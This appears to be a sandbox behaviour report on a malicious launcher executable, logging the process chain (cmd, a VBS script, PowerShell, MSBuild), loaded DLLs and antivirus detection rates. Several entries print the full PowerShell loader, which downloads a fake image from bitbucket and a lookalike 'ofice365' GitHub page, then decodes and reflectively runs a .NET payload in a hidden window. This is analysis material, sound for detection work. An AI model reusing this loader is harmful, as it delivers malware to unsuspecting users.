Code function: 14_2_00447A40 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

14_2_00447A40

Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe

Code function: 0_2_00007FF66FD67AC8 FindResourceA,LoadResource,DialogBoxIndirectParamA,FreeResource,

0_2_00007FF66FD67AC8

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6996:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8:120:WilError_03

Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe

File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP

Jump to behavior

Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe

Process created: C:\Windows\System32\cmd.exe cmd.exe /c 67f525209658e.vbs

Source: IMSoftware{Launcher}3.21.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\cmd.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: IMSoftware{Launcher}3.21.exe	Virustotal: Detection: 54%
Source: IMSoftware{Launcher}3.21.exe	ReversingLabs: Detection: 52%

Source: unknown	Process created: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe "C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe"
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c 67f525209658e.vbs
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67f525209658e.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZgBz@GQ@ZgBz@GQ@ZgBz@C8@ZgBz@GQ@ZgBk@HM@ZgBz@GQ@ZgBz@GQ@Zg@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@y@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Ck@L@@g@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBv@GY@aQBj@GU@Mw@2@DU@LgBn@Gk@d@Bo@HU@Yg@u@Gk@bw@v@DE@LwB0@GU@cwB0@C4@agBw@Gc@Jw@p@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/fsdfsdfs/fsdfdsfsdfsdf/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IeAhfaf/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c 67f525209658e.vbs	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67f525209658e.vbs"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZgBz@GQ@ZgBz@GQ@ZgBz@C8@ZgBz@GQ@ZgBk@HM@ZgBz@GQ@ZgBz@GQ@Zg@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@y@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Ck@L@@g@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBv@GY@aQBj@GU@Mw@2@DU@LgBn@Gk@d@Bo@HU@Yg@u@Gk@bw@v@DE@LwB0@GU@cwB0@C4@agBw@Gc@Jw@p@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/fsdfsdfs/fsdfdsfsdfsdf/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IeAhfaf/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"	Jump to behavior

Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Section loaded: feclient.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe	Section loaded: advpack.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
